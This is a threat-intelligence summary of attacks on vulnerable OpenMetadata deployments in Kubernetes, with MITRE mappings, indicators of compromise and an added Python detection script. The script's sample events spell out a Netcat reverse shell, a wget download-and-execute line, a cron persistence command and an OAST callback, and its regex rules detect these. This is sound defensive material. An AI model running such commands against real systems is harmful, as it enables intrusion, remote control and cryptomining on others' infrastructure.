Microsoft Threat Intelligence reports attackers exploiting critical OpenMetadata vulnerabilities to gain code execution in Kubernetes workloads and deploy cryptomining malware. They target OpenMetadata versions prior to 1.3.1, use the workload's environment variables for lateral movement, establish a reverse shell, and persist with cron jobs; Defender for Containers helps detect the activity.
#OpenMetadata #Interactsh #Netcat #Kubernetes #Cron #Cryptomining #MicrosoftDefenderForContainers
Keypoints
- Attackers exploited new OpenMetadata CVEs to gain code execution on vulnerable Kubernetes workloads.
- Initial access focuses on OpenMetadata instances exposed to the internet with vulnerable images (pre-1.3.1).
- Attackers use Interactsh-related OAST domains to validate connectivity after intrusion.
- Reconnaissance includes gathering OS, hardware, network configuration, and active users.
- Environment variables may reveal service credentials and connection strings for lateral movement.
- Cryptomining malware is downloaded and executed; initial payloads are removed; a reverse shell via Netcat is used for hands-on control; cronjobs provide persistence.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Gain code execution on the vulnerable OpenMetadata container by exploiting CVEs. Quote: “to gain code execution on the container running the vulnerable OpenMetadata image.”
- [T1082] System Information Discovery – Gather OS version, hardware configuration, and active users. Quote: “query information on the network and hardware configuration, OS version, active users, etc.”
- [T1016] System Network Configuration Discovery – Gather information about network configuration as part of discovery. Quote: “query information on the network and hardware configuration, OS version, active users, etc.”
- [T1552.004] Credentials in Environment Variables – Read environment variables that may contain connection strings and credentials. Quote: “read the environment variables of the workload. In the case of OpenMetadata, those variables might contain connection strings and credentials.”
- [T1059] Command and Scripting Interpreter – Use Netcat to establish a reverse shell for hands-on-keyboard access. Quote: “initiate a reverse shell connection to their remote server using Netcat tool.”
- [T1053] Scheduled Task/Job – Use cronjobs for persistence by scheduling malicious tasks. Quote: “for persistence, the attackers use cronjobs for task scheduling.”
- [T1070] Indicator Removal on Host – Remove initial payloads from the workload to cover tracks. Quote: “remove the initial payloads from the workload.”
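A defender's view of the chain mapped above, as an added example that is not taken from the Microsoft report: a small Python rule set scores constructed container process-exec events against the reported stages (environment-variable dump, OAST callback, Netcat reverse shell, cron persistence, payload removal) and only raises an alert when several stages appear on the same workload. The Interactsh OAST domain suffixes, the workload names, the command lines and the 203.0.113.x addresses are all assumptions, not indicators from the page.

```python
import re

# Constructed sample of container process-exec events as (workload, command line).
# Illustrative only; not telemetry from the report. 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    ("openmetadata-7d9f", "uname -a"),
    ("openmetadata-7d9f", "cat /proc/cpuinfo"),
    ("openmetadata-7d9f", "printenv"),
    ("openmetadata-7d9f", "curl -s http://abcd1234.oast.fun"),  # OAST callback (assumed Interactsh domain)
    ("openmetadata-7d9f", "wget -q http://203.0.113.10/x -O /tmp/x && chmod +x /tmp/x && /tmp/x"),
    ("openmetadata-7d9f", "rm -f /tmp/x"),
    ("openmetadata-7d9f", "nc 203.0.113.10 4444 -e /bin/sh"),
    ("openmetadata-7d9f", "(crontab -l; echo '* * * * * /tmp/.m') | crontab -"),
    ("metadata-ui-1", "ls -la /opt/openmetadata"),  # benign activity on another workload
]

# Each rule: (stage label / ATT&CK id, description, regex over the command line).
# The oast.* suffixes are assumed Interactsh-style domains, not values from the report.
RULES = [
    ("T1552.004", "environment variable dump", re.compile(r"\b(printenv|env)\b|/proc/\d+/environ")),
    ("T1016/T1082", "host/network reconnaissance", re.compile(r"\b(uname|ifconfig|whoami)\b|ip (a|addr)\b|cat /proc/cpuinfo")),
    ("Interactsh", "OAST connectivity check", re.compile(r"\boast\.(fun|live|site|online|pro|me)\b")),
    ("T1059", "netcat reverse shell", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s+/bin/(ba)?sh")),
    ("T1053", "cron persistence", re.compile(r"\bcrontab\b|/etc/cron|/var/spool/cron")),
    ("T1070", "payload removal", re.compile(r"\brm\s+(-\w+\s+)*/tmp/")),
    ("download-exec", "fetch and execute", re.compile(r"\b(curl|wget)\b.*&&.*(chmod \+x|\bsh\s|\./)")),
]


def score_workload(events, rules=RULES):
    """Return {workload: set of stage labels whose regex matched at least one command}."""
    hits = {}
    for workload, cmd in events:
        for label, _desc, rx in rules:
            if rx.search(cmd):
                hits.setdefault(workload, set()).add(label)
    return hits


def chain_alerts(events, min_stages=3):
    """Alert only when several stages of the reported chain co-occur on one workload.

    A lone `env` or `uname` is common in healthy containers; requiring min_stages
    distinct stages keeps the rule focused on the OpenMetadata intrusion pattern.
    """
    return {w: sorted(s) for w, s in score_workload(events).items() if len(s) >= min_stages}


if __name__ == "__main__":
    for workload, stages in chain_alerts(SAMPLE_EVENTS).items():
        print(f"ALERT {workload}: {', '.join(stages)}")
```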
Indicators of Compromise
- Executable SHA-256 – 7c6f0bae1e588821bd5d66cd98f52b7005e054279748c2c851647097fa2ae2df, 19a63bd5d18f955c0de550f072534aa7a6a6cc6b78a24fea4cc6ce23011ea01d, 31cd1651752eae014c7ceaaf107f0bf8323b682ff5b24c683a683fdac7525bad
- IP – 8.222.144.60, 61.160.194.160, 8.130.115.208